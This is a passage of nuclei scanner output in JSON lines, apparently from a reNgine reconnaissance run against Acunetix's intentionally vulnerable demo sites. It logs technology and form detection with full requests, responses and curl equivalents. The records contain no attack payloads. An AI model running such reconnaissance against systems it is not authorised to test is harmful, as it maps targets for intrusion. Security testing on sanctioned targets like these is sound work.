\u001f(\\r\\ufffdb\\u0014\\ufffd\\ufffd\\u0017\\u0019k\\ufffd\\ufffdm\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffdjAFn\\ufffdR1\\ufffdR\\ufffd!\\ufffd=\\ufffdn\\ufffdh-\\ufffd8\\ufffd=@s\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd7G\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP5\\u0014\\ufffdԞ'\\u0015\\ufffdݮL\\ufffd)G }\\ufffdI֫\\ufffd\\ufffd\\ufffdg\\u0002\\ufffd\\ufffd\\u0005\\ufffd\\ufffdcC\\u0015K\\ufffdd\\ufffdϾ\\u003e\\ufffdi\\ufffd'v͏\\ufffd\\ufffd\\u000c\\ufffd\\t\\ufffd\\ufffd#w_\\ufffd\\ufffd\\ufffd:k$\\ufffd\\ufffdֺ\\ufffd\\ufffd\\ufffdI\\u0017a@\\u000c\\ufffd͂\\ufffd\\u0001l\\ufffd2\\ufffd3\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4v0\\ufffd\\ufffd02\\ufffd\\ufffd\\ufffd\\ufffd\\u0001$\\u001e\\ufffd\\ufffdާ\\ufffd\\ufffd\\ufffdʐq\\ufffd*L\\ufffd\\\\\\u0005{DP\\ufffdWi\\ufffd\\ufffdV\\ufffd*AK\\ufffd\\ufffdʛ\\ufffd-$S\\ufffdL\\ufffd5\\ufffd\\u0008\\ufffd\\ufffdI\\u0004\\u000f\\u001c\\ufffde\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffdX2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#`\\u001c\\ufffd\\ufffd[`\\u003e\\ufffd\\ufffd`\\ufffd\\ufffd1*\\ufffd{\\ufffd\\ufffd1b\\u0014\\ufffdT\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffdG\\ufffd\\u000c[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4\\ufffdY]\\ufffdE\\u0010\\ufffd!\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd\\u0000\\u000f\\ufffd\\ufffd\\u0015\\u001c\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\u000bE(\\ufffd\\ufffd\\ufffdq\\ufffd\\u003c\\ufffd\\ufffd\\ufffdΓ\\u003c#\\u0019E\\ufffd\\ufffd\\u0000\\ufffd\\u0007\\ufffd՜S}1\\ufffd\\u001d\\u0008Q\\ufffdIRf\\u0014\\ufffd\\n\\ufffdK\\ufffdy\\ufffd\\u0010\\ufffd\\ufffd0\\ufffd\\ufffd\\u0008\\u0018\\ufffd\\ufffdd\\ufffd\\ufffd8\\ufffd\\ufffd3\\ufffdu\\ufffdH\\ufffd\\ufffd\\u00063\\\"\\ufffd\\u001e\\ufffd\\u0004\\ufffdG\\ufffd\\u000c\\t\\u0007\\ufffdi\\ufffdU\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-ҵ\\ufffd\\ufffd\\r\\u0011\\u0014\\ufffdq\\ufffd\\ufffd\\ufffd-ܳ\\ufffd\\ufffdR\\u00179S\\ufffdX\\ufffdA\\ufffd\\u0006\\u001c0#ʌ\\ufffdFG\\ufffdA\\ufffd\\ufffd\\u001fC\\ufffdB\\ufffd\\ufffdc\\ufffdkl\\ufffd\\ufffd0\\ufffd\\ufffd\\u0015\\ufffd\\ufffd:\\u0019\\u0003۸U\\ufffd3Av\\ufffd]\\ufffd\\ufffdZ\\ufffdyv\\ufffd\\ufffd\\ufffd0dm\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffdv.p\\u0006\\\\~ڕOr\\ufffdE\\ufffd\\ufffd\\ufffd\\t)\\ufffd\\ufffd\\u001b\\ufffd\\t$\\u001b{\\ufffd=\\ufffd\\ufffd\\ufffd8\\u0005\\ufffdό\\ufffdy\\u0007T\\ufffdN\\ufffdP!\\ufffdz\\ufffd\\ufffdV\\ufffdgJh\\ufffd\\ufffd\\ufffdul*\\ufffdKnU\\ufffd\\ufffd\\ufffd\\u0003#E6n\\ufffd\\ufffd\\ufffd\\u001b\\u0005'P\\\\\\u001e\\ufffd\\ufffdS\\u00075\\ufffd,\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd[i,\\u00102\\ufffd\\ufffd\\ufffdn\\ufffds\\ufffdLUܤ\\ufffdJ8\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffda\\ufffd\\ufffd_\\u0017\\u0017\\u000e\\u001c\\ufffd\\ufffdW\\ufffdQ\\u0006J\\ufffd\\u003c-\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdpA\\ufffd\\ufffd\\u0011\\ufffd\\ufffdt\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0012\\u001aVffyQQ1\\ufffdA\\u0019Q\\ufffd\\ufffdC`\\ufffdDղR,]\\ufffdY\\ufffd,^'ĉ\\u001dJ+\\ufffd,\\u003eW\\ufffd\\ufffdXd`\\ufffd\\u001c\\u0010u\\ufffd\\ufffd1\\ufffd\\ufffdId\\ufffd\\ufffd\\ufffdAs5MJ\\ufffd:KT\\ufffd+\\u0018\\ufffdf\\ufffd-\\ufffd,\\ufffd\\ufffdx\\ufffdq\\ufffd\\ufffd[\\u0000\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdZ\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\u003c\\ufffdp\\ufffd.\\u0000\\ufffd\\u0012\\ufffd\\ufffd\\ufffd\\u0003\\ufffdq\\ufffd\\u0019\\ufffd\\ufffd0H`\\t*qQ]++J\\ufffdK$/,f)\\u000cNW\\ufffd\\ufffdʶ\\u003c\\ufffd\\ufffd\\u003ck\\ufffd\\ufffd\\ufffdN\\ufffdʉ(\\ufffd\\u001a\\ufffd\\u0001\\u0000-+2\\ufffd\\ufffd8ǥW\\ufffd1\\ufffd\\ufffdH,I$\\ufffd\\u001d\\\\\\ufffdmt\\ufffd+\\ufffd2K\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\u001fՖl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffdbi\\ufffdn\\ufffd[@b\\ufffd\\ufffd\\ufffd\\\"n\\ufffd\\ufffd\\ufffdΏ\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffdEZU\\ufffdt\\u0010\\ufffd\\u0015,\\ufffd\\ufffdWԹQ\\ufffdF\\t\\u003c`6\\ufffd\\ufffd\\ufffd\\u0000\\u0010\\ufffd\\ufffdK\\ufffd\\ufffdl\\u0014\\ufffd\\ufffd̴\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffdŰ\\ufffds\\ufffd\\ufffd \\ufffd\\ufffdƾ|\\ufffd\\ufffd\\ufffd])^\\ufffd\\ufffd\\t\\ufffd\\ufffd\\ufffd7Ԏ\\u0007k\\ufffd\\ufffd|\\ufffd\\ufffd9\\u001e\\ufffd\\u0007\\ufffdg\\ufffd/\\ufffd3T\\ufffd\\ufffd2PR\\ufffd\\ufffd[䥑\\ufffd\\ufffdz\\ufffd\\ufffdL\\u0018\\ufffd\\ufffdW\\u0000\\ufffd!\\ufffdeJg#\\u0007\\ufffd\\ufffdu\\ufffd\\n|\\u00170\\u0002\\ufffd~\\ufffd_Ң\\ufffds\\ufffd\\u0000\\ufffd\\ufffd'\\ufffd\\ufffdQY\\ufffd\\ufffdn\\u001f\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\u000c\\ufffd\\ufffd%cR\\u0017\\u0000\\ufffd@,Wv|\\ufffd\\ufffdG,\\ufffd?X\\ufffdkii\\ufffd\\u0015@\\ufffd\\ufffda}\\ufffd\\ufffdG!,P\\u000c\\ufffd\\u000f|\\ufffd\\t\\u003c\\u0003\\ufffdh{\\ufffd\\ufffd \\ufffd\\ufffdf\\ti\\ufffd\\ufffd2\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\ufffdX\\ufffd\\u001c\\ufffd\\u001fvÝہ\\u0019\\u0007X\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffdm E,\\ufffd\\ufffd\\ufffddv\\ufffd\\u0017R0\\ufffd\\u0001\\ufffd\\u000c\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffdE%\\ufffd\\ufffd4\\ufffd\\u0001\\u0000g\\u001e#l\\u001f\\ufffd\\ufffdDI8n\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd?m\\ufffdD\\ufffdl\\ufffdU\\ufffd\\u001dxl6\\u003c\\ufffd\\ufffd\\u001f\\ufffd\\u000f\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd !\\ufffdx\\ufffd⎵\\ufffd\\u0005\\ufffd^\\ufffdc\\ufffd\\u0013hR\\u000eO\\ufffd\\ufffd,Ř\\ufffd\\\\\\ufffd9ZZ\\ufffd\\ufffd1\\ufffd\\ufffddu\\tU\\u001b\\ufffd$\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3h\\ufffdj\\ufffd\\ufffd\\u0015\\ufffd\\u000cdp]\\u0002'\\ufffd\\ufffd\\ufffd\\u0019S\\ufffd\\ufffd\\ufffd8\\u0004k@\\ufffdė\\ufffd\\ufffdq\\\\n۪\\ufffd\\u0019e\\ufffdY\\u001d\\ufffdQZF$\\ufffd\\u000e\\t\\ufffd\\ufffd'?3\\u000f\\u0007\\u001aZZAZ\\ufffd\\ufffd\\u0018\\ufffd\\u000c\\u001e\\u003e\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\u001b?Kt\\ufffd[\\ufffd\\ufffd~k\\u000b\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdj1\\ufffd`\\r\\ufffd\\ufffd\\ufffd\\u001f\\ufffd`\\n1#,x\\u0007KKU\\u0016\\ufffdL\\u001cG|\\ufffd\\ufffdO^\\u003e0\\u0017\\ufffd\\ufffd\\ufffdS$K;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd6bU\\u0001bH\\u0003\\u003cd\\ufffd\\ufffd\\u0016P\\ufffdr\\ufffd\\u0000\\u0018\\ufffd\\u001aZZmn\\u0000F\\u0008Jn\\ufffd\\ufffdaL.\\ufffd\\ufffd\\ufffd\\ufffdRQ\\ufffdϨl\\ufffd5\\u000f\\\"\\ufffdS_\\u0005;\\ufffd\\ufffdkly\\u0002\\ufffd\\u000f\\ufffd\\u0007Ζ\\ufffd\\ufffd\\ufffd$S\\ufffd\\ufffd\\ufffd\\u0003B\\u0001\\ufffd\\ufffdU_\\r\\ufffdpuWX\\ufffd\\ufffdwf\\ufffd\\ufffd\\u0026\\u000c\\ufffd,m\\ufffd\\ufffd\\ufffd-\\ufffd\\ufffd\\u0002F\\u000e9ǂ5\\ufffdX\\ufffdd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd鈒\\ufffdA\\u0014i\\u0014O\\ufffd,\\u000b\\u0014;\\ufffd\\ufffd\\ufffdң\\ufffd\\ufffdϜaik\\ufffd{@\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0000\\ufffdN\\ufffd%\\ufffd\\ufffdIGE\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0018鷡U%\\ufffd\\t\\\\\\ufffd\\u000cĐ\\ufffd\\ufffd\\ufffd\\u0007\\ufffdA9ڸ1\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdui_RgM\\ufffdYʾ\\u000fv#\\ufffd\\ufffdr}M\\ufffd?1\\ufffdx\\ufffd\\ufffd֩\\u003e*Fqk\\ufffd\\ufffd\\ufffd9\\ufffdE\\ufffd\\ufffdT\\ufffd5L\\ufffd\\ufffd\\u001bܖ8\\u0018\\u0019Ή\\ufffd\\u0016\\ufffd\\ufffdA\\ufffd6x\\ufffdj\\ufffd\\ufffd\\u0013ԤNar\\ufffd\\ufffd\\u0010\\u0008\\ufffdA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdw\\u000f\\u000f\\ufffd\\u0011\\ufffd:\\ufffd\\u0007\\ufffdhi\\u001a\\ufffd4\\ufffd\\ufffd)\\ufffdnW\\n\\ufffdi\\ufffda$B\\u0002E6\\u001dP\\ufffd\\u0003\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffdi\\u0005\\ufffd\\ufffd\\ufffdD\\ufffdT\\ufffd(\\ufffd\\u0019\\u000b\\ufffd\\u000br\\ufffdP\\ufffd\\u0000\\ufffd@\\ufffd\\ufffd\\u001f\\ufffdKK\\\\\\ufffdW\\ufffd\\ufffdX3տ\\ufffd՟#\\ufffdVY\\ufffd\\ufffd\\ufffdC\\u001d\\u0002\\ufffdv;\\ufffdU\\ufffd\\ufffd\\u000c\\ufffdHwaDn\\ufffd\\u0000\\ufffd\\ufffd1\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffdVR\\ufffd\\u0013;,Ԑ\\ufffd6\\ufffd\\u000e\\u0019\\ufffd$\\u000e\\u003ciij\\ufffd\\ufffd\\ufffdLM\\u0005.\\ufffd\\ufffd+\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.663816615Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.960250311Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nLocation: http://testphp.vulnweb.com/wvstests/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:04.999301112Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:06 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:07.009284878Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:35:04 GMT\\r\\nLocation: http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:07.054509091Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/miscellaneous/form-detection.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/form-detection\",\"template-id\":\"form-detection\",\"template-path\":\"/home/rengine/nuclei-templates/http/miscellaneous/form-detection.yaml\",\"info\":{\"name\":\"Form Detection\",\"author\":[\"pdteam\"],\"tags\":[\"form\",\"misc\",\"miscellaneous\"],\"description\":\"A template to detect HTML Forms in page response.\\n\",\"reference\":[\"https://github.com/dirtycoder0124/formcrawler\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com\",\"matched-at\":\"http://testhtml5.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:38:18 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" 